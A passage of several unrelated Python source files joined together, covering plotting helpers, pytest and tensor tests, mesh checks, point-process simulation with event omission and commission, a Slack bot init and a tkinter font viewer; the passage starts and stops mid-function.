    conn_a, conn_b, patch_ref, patch_zoom, joining = _connect_bbox(
        reference_bbox, zoomed_bbox, loc1a=2, loc2a=3,
        loc1b=1, loc2b=4, prop_lines=kwargs)
    ax1.add_patch(patch_ref)
    ax2.add_patch(patch_zoom)
    ax2.add_patch(conn_a)
    ax2.add_patch(conn_b)
    ax2.add_patch(joining)
    return ax1, ax2
|
def test_concurrent_fixture(testdir):
    # Two tests share a fixture and run on one worker process with two
    # threads; the staggered sleeps make the interleaving of fixture setup,
    # test bodies, and finalizers deterministic enough to assert on below.
    testdir.makepyfile("""
        import pytest
        import time
        from six import print_
        @pytest.fixture
        def driver(request):
            fn_name = request.function.__name__
            if fn_name == 'test_1':
                time.sleep(.05)
            print_('before sleep', fn_name)
            time.sleep(.1)
            print_('after sleep', fn_name)
            def after():
                print_('after test', fn_name)
            request.addfinalizer(after)
        def test_0(driver):
            print_('inside test_0')
            time.sleep(.2)
        def test_1(driver):
            print_('inside test_1')
    """)
    # -s is required so the print_ output reaches stdout for matching.
    result = testdir.runpytest_subprocess(
        '-s',
        '--tests-per-worker=2'
    )
    # Expected interleaving of the two threads' output.
    result.stdout.fnmatch_lines([
        'pytest-parallel: 1 worker (process), 2 tests per worker (threads)',
        '*before sleep test_0',
        '*before sleep test_1',
        '*after sleep test_0',
        '*inside test_0',
        '*after sleep test_1',
        '*inside test_1',
        '*after test test_1',
        '*after test test_0'
    ])
    result.assert_outcomes(passed=2)
    assert result.ret == 0
|
import torch.nn as nn
import torch
from ..modeling.sync_batchnorm.batchnorm import SynchronizedBatchNorm2d
def init_params(models, mode='xv'):
    """Initialize the parameters of one or more models in-place.

    Parameters:
        models: a single module or a list of modules to initialize.
        mode: 'xv' for Xavier-normal weight initialization, or 'net2net' to
            set conv/linear weights to the identity (function-preserving).
    """
    assert mode in {'xv', 'net2net'}
    if not isinstance(models, list):
        models = [models]
    for model in models:
        for m in model.modules():
            if isinstance(m, (nn.Conv2d, nn.ConvTranspose2d)):
                if mode == 'net2net':
                    # An identity mapping requires a square 1x1 convolution.
                    m_in_channels = m.in_channels
                    assert m_in_channels == m.out_channels and m.kernel_size[0] == 1
                    m.weight.data.copy_(torch.eye(m_in_channels).view(m_in_channels, m_in_channels, 1, 1))
                else:
                    nn.init.xavier_normal_(m.weight)
                # Idiom fix: proper statement instead of a conditional
                # expression used for its side effect.
                if m.bias is not None:
                    m.bias.data.fill_(0)
            elif isinstance(m, nn.Linear):
                if mode == 'xv':
                    nn.init.xavier_normal_(m.weight)
                elif mode == 'net2net':
                    # Identity linear layer (assumes in_features == out_features).
                    m.weight.data.copy_(torch.eye(m.out_features))
                if m.bias is not None:
                    m.bias.data.fill_(0)
            elif isinstance(m, (SynchronizedBatchNorm2d, nn.BatchNorm2d)):
                m.weight.data.fill_(1)
                m.bias.data.fill_(0)
def parse_delaunay(fname):
    """Load a Delaunay triangulation from an HDF5 file.

    Returns a dict with one numpy array per HDF5 dataset, plus a 'facets'
    entry holding the 'triangles' dataset reshaped to (n_triangles, 3).
    """
    import h5py
    import numpy
    res = {}
    # Open read-only: this function only reads.  'r+' needlessly demanded
    # write access and failed on read-only files.
    with h5py.File(fname, 'r') as f:
        for field in f:
            res[field] = numpy.array(f[field])
    res['facets'] = numpy.reshape(res['triangles'], (-1, 3))
    return res
def locate_point(x_list, y_list, xp, yp, tol=1e-10):
    """Return the index of the point in (x_list, y_list) nearest to (xp, yp).

    Asserts that the nearest point lies within ``tol`` (squared distance).
    """
    import numpy
    squared_dist = (x_list - xp) ** 2 + (y_list - yp) ** 2
    nearest = numpy.argmin(squared_dist)
    assert squared_dist[nearest] < tol
    return nearest
def is_boxed(x, y, offset=0):
    """Return True when (x, y) lies inside the unit square shrunk by offset."""
    lo, hi = 0 + offset, 1 - offset
    return lo <= x <= hi and lo <= y <= hi
def main():
    """Check that every facet of the partial meshes appears in the whole mesh.

    Returns True on success, False on the first missing facet.
    """
    import os
    #import pylab
    import numpy
    import re
    import glob
    # Escape hatch: skip the comparison entirely when a marker file exists.
    if os.path.isfile('serial_ignore.txt'):
        return True
    whole = parse_delaunay('whole.h5')
    # Load the partial triangulations, ordered by their numeric suffix.
    parts = [parse_delaunay(fname) for fname in
             sorted(glob.glob('part_*.h5'),
                    key=
                    lambda x: int(re.search(r'part_(\d+).h5', x).group(1)))]
    whole['sorted facets'] = [sorted(itm) for itm in whole['facets']]
    for n, part in enumerate(parts):
        # Map each local point to its index in the whole triangulation;
        # points outside the unit box get -1.
        index_table = [
            locate_point(
                whole['x_coordinate'],
                whole['y_coordinate'],
                x, y) if is_boxed(x, y)
            else -1
            for x, y in
            zip(part['x_coordinate'], part['y_coordinate'])]
        for facet in part['facets']:
            # Facets made purely of local points must appear in the whole mesh.
            if numpy.all([itm < part['point number'] for itm in facet]):
                t_facet = sorted([index_table[itm] for itm in facet])
                if not t_facet in whole['sorted facets']:
                    return False
            # Facets well inside the box (margin 0.04) that touch at least one
            # local point must appear as well.
            elif numpy.all(
                [is_boxed(part['x_coordinate'][itm],
                          part['y_coordinate'][itm], 0.04)
                 for itm in facet]) and numpy.any([itm < part['point number'] for itm in facet]):
                t_facet = sorted([index_table[itm] for itm in facet])
                if not t_facet in whole['sorted facets']:
                    return False
    return True
if __name__ == '__main__':
    import os
    # Clear previous result markers, then record pass/fail as an empty marker
    # file consumed by the surrounding test harness.
    os.system('rm *.res;')
    if main():
        os.system('touch test_passed.res')
    else:
        os.system('touch test_failed.res')
|
import numpy as np
import scipy.stats as stats
import matplotlib.pyplot as plt
import util
import copy
def merge(a, b, idx=None):
    """Merge two sorted sequences into one sorted list.

    When ``idx`` (a list) is supplied, it is extended in-place with the
    source of each output element: 0 for ``a``, 1 for ``b``.  Ties go to
    ``a`` first, so the merge is stable.
    """
    out = []
    i = j = 0
    while i < len(a) and j < len(b):
        if a[i] <= b[j]:
            out.append(a[i])
            if idx is not None:
                idx.append(0)
            i += 1
        else:
            out.append(b[j])
            if idx is not None:
                idx.append(1)
            j += 1
    # At most one of the tails is non-empty; append both unconditionally.
    tail_a = a[i:]
    tail_b = b[j:]
    out.extend(tail_a)
    out.extend(tail_b)
    if idx is not None:
        idx.extend([0] * len(tail_a))
        idx.extend([1] * len(tail_b))
    return out
class MJPSim:
    """Simulate a Markov jump process (MJP) context together with a target
    point process whose intensity is modulated by the MJP state."""

    def __init__(self, q, param):
        # q: (m, m) generator matrix of the MJP (rows sum to zero).
        # param: target-process parameters; interpretation is left to subclasses.
        self.q = q
        self.param = param

    def sim(self, t_max, dt):
        """Sample one sequence on [0, t_max]; dt is the grid step used to
        record the target intensity."""
        vt_z, vz = self.sim_mjp(t_max=t_max)
        vt_event, lambda_x, t_x = self.sim_target(self.param, vt_z, vz, t_max=t_max, dt=dt)
        return {
            'start': 0,
            'stop': t_max,
            'time_context': vt_z,
            'mark_context': vz,
            'time_target': vt_event,
            'mark_target': np.ones_like(vt_event, dtype=np.int32),
            'lambda_x': lambda_x,
            't_x': t_x,
        }

    def sim_mjp(self, t_max):
        """Sample the MJP path starting in state 0 at t = 0.

        Returns (jump times, states) as numpy arrays.
        """
        q = self.q
        m = q.shape[0]
        # A valid generator matrix has zero row sums (allow tiny float error).
        assert np.allclose(np.sum(q, axis=1), 0)
        states = np.arange(0, m)
        stay = np.diag(q)
        trans = q.copy()
        np.fill_diagonal(trans, 0)
        # Bug fix: normalize each ROW to a probability distribution.  The
        # previous ``trans / np.sum(trans, axis=1)`` broadcast the row sums
        # across columns, which is only correct for symmetric generators and
        # made np.random.choice fail for asymmetric ones.
        trans = trans / np.sum(trans, axis=1, keepdims=True)
        vt_z = [0]
        vz = [0]
        s = 0
        t = 0
        while True:
            # Holding time in state s is exponential with rate -q[s, s].
            t += np.random.exponential(-1 / stay[s])
            if t <= t_max:
                s = np.random.choice(states, p=trans[s, :])
                vt_z.append(t)
                vz.append(s)
            else:
                break
        return np.array(vt_z), np.array(vz, dtype=np.int32)

    def sim_target(self, param, vt_z, vz, t_max, dt):
        """Sample the target process given the MJP path; subclass hook."""
        raise NotImplementedError

    def sim_next(self, lambda_t, lambda_max, t_beg, t_end):
        """Sample the next event after t_beg by thinning.

        lambda_max must dominate lambda_t on (t_beg, t_end].  May return a
        time > t_end, which callers treat as "no event in this interval".
        """
        t_next = t_beg
        while True:
            t_next += np.random.exponential(1 / lambda_max)
            if (t_next > t_end) or (np.random.uniform() * lambda_max <= lambda_t(t_next)):
                return t_next
class PoisMJPSim(MJPSim):
    """Piecewise-homogeneous Poisson target: in MJP state z the target
    process has constant intensity lambda_[z]."""

    def sim_target(self, lambda_, vt_z, vz, t_max, dt):
        # Grid on which the piecewise-constant intensity is recorded.
        t_x = np.arange(dt, t_max, dt)
        lambda_x = np.zeros_like(t_x)
        t = 0
        vt_event = []
        # Close the final holding interval at t_max.
        vt_z = np.append(vt_z, t_max)
        for k in range(len(vt_z)-1):
            t_l = vt_z[k + 1]
            # Constant intensity on (t, t_l], determined by the state vz[k].
            lambda_x[(t_x > t) & (t_x <= t_l)] = lambda_[vz[k]]
            lambda_t = lambda t: lambda_[vz[k]]
            lambda_max = lambda_[vz[k]]
            # Draw events by thinning until we step past the interval end.
            while True:
                t = self.sim_next(lambda_t, lambda_max, t, t_l)
                if t <= t_l:
                    vt_event.append(t)
                else:
                    break
            t = t_l
        vt_event = np.array(vt_event)
        return vt_event, lambda_x, t_x
class PoisSinMJPSim(MJPSim):
    """Inhomogeneous Poisson target with intensity param[z] * (1 + sin(t)),
    modulated by the current MJP state z."""

    def sim_target(self, param, vt_z, vz, t_max, dt):
        # Grid on which the intensity is recorded.
        t_x = np.arange(dt, t_max, dt)
        lambda_x = np.zeros_like(t_x)
        t = 0
        vt_event = []
        # Close the final holding interval at t_max.
        vt_z = np.append(vt_z, t_max)
        for k in range(len(vt_z)-1):
            t_l = vt_z[k + 1]
            idx = (t_x > t) & (t_x <= t_l)
            lambda_t = lambda t: param[vz[k]] * (1 + np.sin(t))
            lambda_x[idx] = lambda_t(t_x[idx])
            # Bug fix: (1 + sin(t)) ranges over [0, 2], so the dominating
            # rate for thinning must be 2 * param.  Using param alone broke
            # the thinning bound wherever sin(t) > 0 and under-sampled events.
            lambda_max = 2 * param[vz[k]]
            while True:
                t = self.sim_next(lambda_t, lambda_max, t, t_l)
                if t <= t_l:
                    vt_event.append(t)
                else:
                    break
            t = t_l
        vt_event = np.array(vt_event)
        return vt_event, lambda_x, t_x
class GamMJPSim(MJPSim):
    """Gamma-renewal target process: inter-event times follow a Gamma
    distribution with state-dependent shape/scale, sampled via its hazard."""

    def sim_target(self, param, vt_z, vz, t_max, dt):
        t_x = np.arange(dt, t_max, dt)
        lambda_x = np.zeros_like(t_x)
        t = 0
        # Time of the previous event; the hazard depends on the elapsed time.
        t_prev = 0
        vt_event = []
        vt_z = np.append(vt_z, t_max)
        # Intensity values recorded exactly at event times (merged in below).
        lambda_event = []
        for k in range(len(vt_z)-1):
            # Shape a and scale b of the Gamma inter-event distribution for the
            # current MJP state; step is its mean.
            a = param[vz[k], 0]
            b = 1/param[vz[k], 1]
            step = a*b
            # Work in sub-intervals of roughly one mean inter-event time so the
            # thinning bound stays tight; snap to the state boundary when close.
            if vt_z[k+1] - t - step < 10*dt:
                t_l = vt_z[k+1]
            else:
                t_l = t+step
            while True:
                idx = (t_x > t) & (t_x <= t_l)
                def lambda_t(t):
                    # Gamma hazard at elapsed time t - t_prev: pdf / survival.
                    return stats.gamma.pdf(t - t_prev, a, scale=b) / stats.gamma.sf(t - t_prev, a, scale=b)
                lambda_x[idx] = lambda_t(t_x[idx])
                # Thinning bound taken at the interval end for a >= 1 and at
                # the start otherwise (the Gamma hazard is monotone: increasing
                # for a >= 1, decreasing for a < 1).
                if a >= 1:
                    lambda_max = lambda_t(t_l)
                else:
                    lambda_max = lambda_t(t)
                assert(lambda_max < np.inf)
                if lambda_max == 0:  # avoid overflow in exponential
                    t = t_l + 1
                else:
                    t = self.sim_next(lambda_t, lambda_max, t, t_l)
                if t <= t_l:
                    vt_event.append(t)
                    lambda_event.append(lambda_t(t))
                    t_prev = t
                elif t_l >= vt_z[k + 1]:
                    # Reached the end of the current MJP state interval.
                    break
                else:
                    # Advance to the next sub-interval of the same state.
                    t = t_l
                    if vt_z[k+1] - t - step < 10*dt:
                        t_l = vt_z[k+1]
                    else:
                        t_l = t+step
            t = t_l
        vt_event = np.array(vt_event)
        lambda_event = np.array(lambda_event)
        # Also record the intensity at the event times, keeping t_x sorted.
        t_x = np.concatenate((t_x, vt_event))
        lambda_x = np.concatenate((lambda_x, lambda_event))
        idx = np.argsort(t_x)
        t_x = t_x[idx]
        lambda_x = lambda_x[idx]
        return vt_event, lambda_x, t_x
class OmissSim:
    """Remove (omit) events from a sequence and generate labelled test points."""

    def __init__(self, w, rate_omiss=0.1, regulator=None):
        # regulator is a function which changes the rate over time
        self.rate_omiss = rate_omiss
        # Maximum spacing between generated test points.
        self.w = w
        self.regulator = regulator

    def sim(self, seq):
        """Return a copy of seq with events omitted, plus test points whose
        labels mark the intervals containing an omission."""
        vt_event = seq['time_target']
        t_max = seq['stop']
        t_min = seq['start']
        vt_event, vt_omiss = self.sim_omiss(vt_event, t_min)
        vt_test = self.gen_test(vt_event, t_min, t_max)
        vlabel = self.gen_label(vt_test, vt_event, vt_omiss)
        seq = seq.copy()
        seq.update({
            'time_target': vt_event,
            'mark_target': np.ones_like(vt_event, dtype=np.int32),
            'time_test': vt_test,
            'label_test': vlabel,
            'time_omiss': vt_omiss,
            'mark_omiss': np.ones_like(vt_omiss, dtype=np.int32),
        })
        return seq

    def sim_omiss(self, vt_event, t_min):
        """Independently drop each event; return (kept, omitted) times."""
        n = len(vt_event)
        if self.regulator is None:
            rate = self.rate_omiss
        else:
            rate = self.rate_omiss * self.regulator(vt_event)
        trials = np.random.binomial(1, rate, n)
        # always keep the event at t_min
        # (robustness fix: guard the empty-input case, which previously
        # raised an IndexError on vt_event[0])
        if n > 0 and vt_event[0] == t_min:
            trials[0] = 0
        idx_omiss = np.nonzero(trials)
        vt_omiss = vt_event[idx_omiss]
        vt_event_left = np.delete(vt_event, idx_omiss)
        return vt_event_left, vt_omiss

    def gen_test(self, vt_event, t_min, t_max):
        """Generate test points: every kept event plus uniformly jittered
        fill-in points so consecutive test points are at most w apart."""
        w = self.w
        vt_test = []
        vt = vt_event
        # we ignore events at t_min but keep events at t_max
        if len(vt) > 0 and vt[0] == t_min:
            vt = np.concatenate((vt, [t_max]))
        else:
            vt = np.concatenate(([t_min], vt, [t_max]))
        n = len(vt)
        for i in range(n-1):
            t = vt[i]
            vt_test.append(vt[i])
            while vt[i+1] > t + w:
                t_next = t + np.random.uniform(0, w)
                vt_test.append(t_next)
                t = t_next
        vt_test = np.array(vt_test)
        return vt_test

    def gen_label(self, vt, vt_event, vt_omiss):
        """Label each interval (vt[i], vt[i+1]] with 1 if it contains an
        omitted event (the first interval is closed on the left)."""
        n = len(vt)
        vlabel = np.zeros(n-1)
        for i in range(n-1):
            t_beg = vt[i]
            t_end = vt[i+1]
            if i == 0:
                vlabel[i] = np.any((vt_omiss >= t_beg) & (vt_omiss <= t_end))
            else:
                vlabel[i] = np.any((vt_omiss > t_beg) & (vt_omiss <= t_end))
        return vlabel
class CommissSim:
    """Inject spurious (commission) events into a sequence and label them."""

    def __init__(self, rate=0.1, shrink=1, regulator=None):
        # rate: intensity of the injected Poisson commissions.
        # shrink: < 1 squeezes inter-event gaps before placing commissions.
        # regulator: optional function modulating the keep-probability over time.
        self.rate = rate
        self.shrink = shrink
        self.regulator = regulator

    def sim(self, seq):
        """Return a copy of seq with commissions merged in and labelled."""
        vt_event = seq['time_target']
        t_max = seq['stop']
        t_min = seq['start']
        vt_event, vlabel = self.sim_commiss(vt_event, t_min, t_max)
        # skip the event at t_min
        vt_test = vt_event
        if vt_test[0] == t_min and vlabel[0] == 0:
            vt_test = vt_test[1:]
            vlabel = vlabel[1:]
        # padding
        vt_test = np.concatenate(([t_min], vt_test))
        seq = seq.copy()
        seq.update({
            'time_target': vt_event,
            'mark_target': np.ones_like(vt_event, dtype=np.int32),
            'time_test': vt_test,
            'label_test': vlabel,
        })
        return seq

    def sim_commiss(self, vt_event, t_min, t_max):
        """Sample commission times and merge them with the true events.

        Returns the merged event times and a 0/1 label array (1 = commission).
        """
        rate = self.rate
        shrink = self.shrink
        if shrink < 1:
            # Place commissions on a time axis obtained by shrinking every
            # inter-event gap, then map them back to the original axis.
            inter_event = np.diff(np.concatenate((vt_event, [t_max])))
            inter_event *= shrink
            total_inter_event = inter_event.sum()
            # NOTE(review): np.random.poisson(..., 1) returns a length-1 array;
            # range(m) below relies on implicit array-to-int coercion.
            m = np.random.poisson(total_inter_event * rate, 1)
            vt_commiss = np.random.uniform(0, total_inter_event, m)
            cum_inter_event = np.cumsum(inter_event)
            for i in range(m):
                # Locate the gap containing this commission and shift it back
                # behind the corresponding real event.
                j = np.argwhere(cum_inter_event > vt_commiss[i])[0]
                if j > 0:
                    tmp = vt_commiss[i] - cum_inter_event[j-1]
                else:
                    tmp = vt_commiss[i]
                tmp += vt_event[j]
                assert(tmp >= vt_event[0])
                vt_commiss[i] = tmp
        else:
            # Homogeneous Poisson commissions over the whole window.
            m = np.random.poisson((t_max - t_min) * rate, 1)
            vt_commiss = np.random.uniform(t_min, t_max, m)
        if self.regulator is not None:
            # Thin commissions by the time-varying keep-probability.
            p = self.regulator(vt_commiss)
            keep = (np.random.binomial(1, p) > 0)
            vt_commiss = vt_commiss[keep]
        vt_commiss = np.sort(vt_commiss)
        vlabel = []
        # merge() records the source of each merged element in vlabel:
        # 0 = original event, 1 = commission.
        vt_event = np.array(merge(vt_event, vt_commiss, vlabel))
        vlabel = np.array(vlabel)
        assert(util.is_sorted(vt_event))
        return vt_event, vlabel
def compute_empirical_rate(seqs):
    """Return the average event rate (events per unit time) over sequences."""
    total_time = sum(seq['stop'] - seq['start'] for seq in seqs)
    total_events = sum(len(seq['time_target']) for seq in seqs)
    return total_events / total_time
def sim_data_test_omiss(data_train, data_test, p=0.1, seed=0, regulator=None, regulator_generator=None):
    """Create an omission-corrupted deep copy of data_test.

    The test-point spacing w is twice the mean inter-event time of the
    training data.  When regulator_generator is given, a fresh regulator is
    drawn for every sequence; otherwise the supplied regulator is reused.
    """
    np.random.seed(seed)
    corrupted = copy.deepcopy(data_test)
    w = 2 / compute_empirical_rate(data_train)
    for i in range(len(corrupted)):
        if regulator_generator is not None:
            regulator = regulator_generator()
        omiss_sim = OmissSim(w, p, regulator=regulator)
        corrupted[i] = omiss_sim.sim(corrupted[i])
    return corrupted
def sim_data_test_commiss(data_train, data_test, alpha=0.1, seed=0, regulator=None, regulator_generator=None):
    """Create a commission-corrupted deep copy of data_test.

    Commissions are injected at alpha times the test data's empirical rate.
    When regulator_generator is given, a fresh regulator is drawn per
    sequence; otherwise the supplied regulator is reused.
    """
    np.random.seed(seed)
    corrupted = copy.deepcopy(data_test)
    rate = compute_empirical_rate(data_test)
    for i in range(len(corrupted)):
        if regulator_generator is not None:
            regulator = regulator_generator()
        commiss_sim = CommissSim(alpha * rate, 1, regulator=regulator)
        corrupted[i] = commiss_sim.sim(corrupted[i])
    return corrupted
def create_rand_pc_regulator(step, t_min, t_max):
    """Return a piecewise-constant random regulator on [t_min, t_max).

    The interval is split into bins of width ``step``; each bin receives an
    independent Uniform(0, 1) level, fixed at creation time.
    """
    n_bins = np.floor((t_max - t_min) / step).astype(int)
    levels = np.random.uniform(size=n_bins)

    def regulator(t):
        bin_idx = np.floor((t - t_min) / step).astype(int)
        return levels[bin_idx]

    return regulator
def sparse_rand_pc_regulator(t, step):
    """Piecewise-constant random values over the bins actually hit by t.

    Only bins of width ``step`` containing at least one element of t receive
    a Uniform(0, 1) level, so the number of random draws equals the number
    of occupied bins.
    """
    bin_idx = np.floor(t / step).astype(int)
    occupied = np.unique(bin_idx)
    levels = np.random.uniform(size=len(occupied))
    values = np.zeros_like(t)
    for level_pos, bin_id in enumerate(occupied):
        values[bin_idx == bin_id] = levels[level_pos]
    return values
def plot_events(seq):
    """Plot a simulated sequence: intensity curve plus event stems.

    Ordinary events are drawn black; omitted events (when present) or
    positively-labelled test intervals are drawn red.
    """
    vt_event = seq['time_target']
    lambda_x = seq['lambda_x']
    t_x = seq['t_x']
    vt_omiss = seq.get('time_omiss')
    # Stem height: a fixed fraction of the peak intensity.
    scale = 0.25 * np.max(lambda_x)
    plt.figure()
    if vt_omiss is None:
        vlabel = seq.get('label_test')
        if vlabel is None:
            # Plain sequence: intensity plus all events in black.
            plt.plot(t_x, lambda_x)
            plt.stem(vt_event, scale*np.ones_like(vt_event), 'k-', 'ko')
        else:
            # Commission-style labels: label 1 events in red.
            plt.plot(t_x, lambda_x)
            plt.stem(vt_event[vlabel == 0], scale*np.ones_like(vt_event[vlabel == 0]), 'k-', 'ko')
            if any(vlabel):
                plt.stem(vt_event[vlabel == 1], scale*np.ones_like(vt_event[vlabel == 1]), 'r-', 'ro')
    else:
        # Omission-style sequence: kept events in black, omitted in red.
        plt.plot(t_x, lambda_x)
        if len(vt_event) > 0:
            plt.stem(vt_event, scale*np.ones_like(vt_event), 'k-', 'ko')
        if len(vt_omiss) > 0:
            plt.stem(vt_omiss, scale*np.ones_like(vt_omiss), 'r-', 'ro')
if __name__ == '__main__':
    # --- Homogeneous-Poisson demo (disabled) ---
    # t_max = 100
    # dt = 0.01
    # q = np.array([
    #     [-0.1, 0.05, 0.05],
    #     [0.05, -0.1, 0.05],
    #     [0.05, 0.05, -0.1]
    # ])
    # param = np.array([.1, .1, .2])
    # w = 2 / np.max(param)
    # pois_sim = PoisMJPSim(q, param)
    # seq = pois_sim.sim(t_max, dt)
    # plot_events(seq)
    # omiss_sim = OmissSim(w, 0.1)
    # seq_omiss = omiss_sim.sim(seq)
    # plot_events(seq_omiss)
    # commiss_sim = CommissSim(shrink=1)
    # seq_commiss = commiss_sim.sim(seq)
    # plot_events(seq_commiss)
    # plt.show()
    # --- Sinusoidal-Poisson demo with omission / commission corruption ---
    t_max = 100
    dt = 0.01
    # Symmetric 3-state MJP generator matrix.
    q = np.array([
        [-0.1, 0.05, 0.05],
        [0.05, -0.1, 0.05],
        [0.05, 0.05, -0.1]
    ])
    param = np.array([.1, .2, .3])
    # Test-point spacing: twice the shortest mean inter-event time.
    w = 2 / np.max(param)
    # regulator = lambda t: (1 + np.sin(t/100*2*np.pi))/2
    regulator = create_rand_pc_regulator(20, 0, t_max)
    # regulator = lambda t: sparse_rand_pc_regulator(t, 20)
    x = np.arange(0, t_max, dt)
    y_reg = regulator(x)
    pois_sim = PoisSinMJPSim(q, param)
    seq = pois_sim.sim(t_max, dt)
    plot_events(seq)
    # Constant-rate omission, then regulator-modulated omission.
    omiss_sim = OmissSim(w, 0.9)
    seq_omiss = omiss_sim.sim(seq)
    plot_events(seq_omiss)
    omiss_sim = OmissSim(w, 1, regulator=regulator)
    seq_omiss = omiss_sim.sim(seq)
    plot_events(seq_omiss)
    plt.plot(x, y_reg, 'g--')
    # Commissions scaled to the sequence's own empirical rate.
    rate = compute_empirical_rate(([seq]))
    commiss_sim = CommissSim(rate=0.9*rate)
    seq_commiss = commiss_sim.sim(seq)
    plot_events(seq_commiss)
    commiss_sim = CommissSim(rate=1*rate, regulator=regulator)
    seq_commiss = commiss_sim.sim(seq)
    plot_events(seq_commiss)
    plt.plot(x, y_reg, 'g--')
    plt.show()
    # --- Gamma-renewal demo (disabled) ---
    # t_max = 100
    # dt = 0.01
    # q = np.array([
    #     [-0.05, 0.05],
    #     [0.05, -0.05]
    # ])
    # param = np.array([
    #     [100., 10.],
    #     [50., 10.]])
    # w = 2 * np.min(param[:,0]/param[:,1])
    # gam_sim = GamMJPSim(q, param)
    # seq = gam_sim.sim(t_max, dt)
    # plot_events(seq)
    # plt.vlines(seq['time_context'], 0, np.max(seq['lambda_x']), linestyles='dashed')
    # omiss_sim = OmissSim(w, 0.1)
    # seq_omiss = omiss_sim.sim(seq)
    # plot_events(seq_omiss)
    # commiss_sim = CommissSim(shrink=1)
    # seq_commiss = commiss_sim.sim(seq)
    # plot_events(seq_commiss)
    # plt.show()
|
#!/usr/bin/env python3
import PySimpleGUI as sg
# This example would work great as A desktop
# double-click executable in windows. Just
# create shortcut(send-to Desktop) this file,
# and run it using pythonw.exe(no prompt) instead
# of python.exe(or open-with).
# Change default in files properties.
# Two arguments are two rows(Works as paragraphs with '\n').
# Should apply for other elements.
# Show a popup whose two arguments render as two rows, then exit cleanly.
# NOTE(review): exit() relies on the site module; sys.exit(0) is the
# conventional choice for scripts.
sg.Popup('One 1', 'Two\nTwo.One')
exit(0)
|
"""phial Slack Bot."""
from phial.bot import Phial
from phial.globals import command
from phial.scheduler import Schedule
from phial.wrappers import Attachment, Message, PhialResponse, Response
__version__ = "0.10.1"
__all__ = [
"Phial",
"command",
"Response",
"Attachment",
"Schedule",
"Message",
"PhialResponse",
]
|
from CGSearchRace.Unit import Unit
class Checkpoint(Unit):
    """A checkpoint entity; currently identical to Unit apart from its type."""

    def __init__(self, x, y):
        # Position handling is delegated entirely to the Unit base class.
        super().__init__(x, y)
|
from . import sparsematrix
import numpy as np
import numpy.random as npr
import scipy as sp
import scipy.sparse
from . import simplefac
import sys
import tensorflow as tf
def test_sparse():
    """SparseMatrix round-trips a scipy CSR matrix for full, sliced and
    transposed reads."""
    dense = npr.randn(30, 42)
    dense[npr.randn(*dense.shape) > 0] = 0
    scipy_csr = sp.sparse.csr_matrix(dense)
    wrapped = sparsematrix.SparseMatrix.from_scipy_sparse(scipy_csr)
    reference = scipy_csr.todense()
    assert np.allclose(wrapped[:], reference)
    assert np.allclose(wrapped[2:7], reference[2:7])
    assert np.allclose(wrapped.T[2:7], reference.T[2:7])
def test_sample_sparse(kind='bernoulli'):
    # Smoke test: draw a posterior-predictive sample in sparse and in dense
    # form from the same seeded RNG state.
    # NOTE(review): `a` and `b` are never compared, so this currently only
    # verifies that both code paths run without raising.
    model = simplefac.example_model(700, 800, 5, kind, mag=1, sigmultiplier=.001, dtype=tf.float32)
    tf.random.set_seed(0)
    a = model.posterior_predictive_sample(sparse=True)
    tf.random.set_seed(0)
    b = model.posterior_predictive_sample(sparse=False)
def test_simplefac(kind, Nk=2):
    """Each coordinate update of the factorization must not increase the loss."""
    model = simplefac.example_model(20, 30, Nk, kind, mag=1, sigmultiplier=.01)
    data = model.posterior_predictive_sample()
    data_tf = sparsematrix.to_tensorflow(data)
    model2 = simplefac.initialize(data, Nk, kind)

    def assert_update_improves(update_name):
        before = model2.loss(data_tf)['loss']
        getattr(model2, 'update_' + update_name)(data_tf)
        after = model2.loss(data_tf)['loss']
        assert after <= before

    for update_name in ('thetas', 'prior_cols', 'prior_rows', 'rows', 'cols'):
        assert_update_improves(update_name)
|
"""
フォントリスト表示
"""
import tkinter as tk
from tkinter.constants import HORIZONTAL, VERTICAL
import tkinter.font
import sys
class FontLib():
    """
    Font list display class.
    """
    def __init__(self, text: str = "sample サンプル ", font_size: int = 14) -> None:
        """
        Constructor.

        Args:
            text: sample text rendered with each font.
            font_size: point size used for the samples.
        """
        self.root = tk.Tk()
        self.root.geometry("800x600")  # window size
        self.fonts = tk.font.families()  # font families known to tk
        self.text = text  # sample text to display
        self.MAX_ROWS = 25  # default number of rows
        self.MAX_COLUMN = 4  # default number of columns
        self.FONT_SIZE = font_size  # font size for the samples
        # Build a scrollable Frame: a Canvas with scrollbars hosting a Frame.
        self.canvas = tk.Canvas(self.root)  # Canvas created on root
        self.frame = tk.Frame(self.canvas)  # Frame created on the Canvas
        self.vsb = tk.Scrollbar(self.root, orient=VERTICAL, command=self.canvas.yview)  # vertical scrollbar on root
        self.hsb = tk.Scrollbar(self.root, orient=HORIZONTAL, command=self.canvas.xview)  # horizontal scrollbar on root
        self.canvas.configure(yscrollcommand=self.vsb.set)  # hook vertical scrolling to the Canvas
        self.canvas.configure(xscrollcommand=self.hsb.set)  # hook horizontal scrolling to the Canvas
        # pack -- the scrollbars must be packed before the canvas
        self.hsb.pack(side="bottom", fill="x")
        self.vsb.pack(side="right", fill="y")
        self.canvas.pack(side="left", fill="both", expand=True)
        # place the frame widget onto the canvas
        self.canvas.create_window((0, 0), window=self.frame, anchor="nw")

    def font_list_by_label(self) -> None:
        """
        1. List every family from families() using Labels.
        """
        for i, font_name in enumerate(self.fonts):
            # Create the label; build a Font object first and pass it via the
            # font option.
            font_ = tkinter.font.Font(self.root, family=font_name, size=self.FONT_SIZE)
            label = tk.Label(self.frame, text=f"{self.text} {font_name}", font=font_)
            # grid
            # column-first layout with a fixed number of rows:
            # label.grid(row=i % self.MAX_ROWS, column=i // self.MAX_ROWS, sticky="w")
            # row-first layout with a fixed number of columns:
            label.grid(row=i // self.MAX_COLUMN, column=i % self.MAX_COLUMN, sticky="w")
        # Finalize the Frame size, then set the Canvas scroll region to cover it.
        self.frame.update_idletasks()
        self.canvas.config(scrollregion=self.canvas.bbox("all"))

    def font_list_radiobutton(self) -> None:
        """
        2. List every family from families() using Radiobuttons.
        Uses ScrolledFrame.
        """
        from tkinter_libs import ScrolledFrame
        # Destroy the widgets already created under root so the ScrolledFrame
        # can take over.
        for w in self.root.winfo_children():
            w.destroy()
        # ScrolledFrame
        self.frame = ScrolledFrame(self.root, has_h_bar=True, background="ivory")
        self.frame.parent_frame.pack(fill="both", expand=True)
        # Must be kept on self; otherwise everything appears selected on mouse
        # movement.
        self.var_radio = tk.IntVar(value=0)
        for i, font_name in enumerate(self.fonts):
            # Create the radio button; pass the font directly via the option.
            rb = tk.Radiobutton(self.frame, text=f"{self.text} {font_name}",
                                font=(font_name, self.FONT_SIZE), variable=self.var_radio, value=i)
            # grid
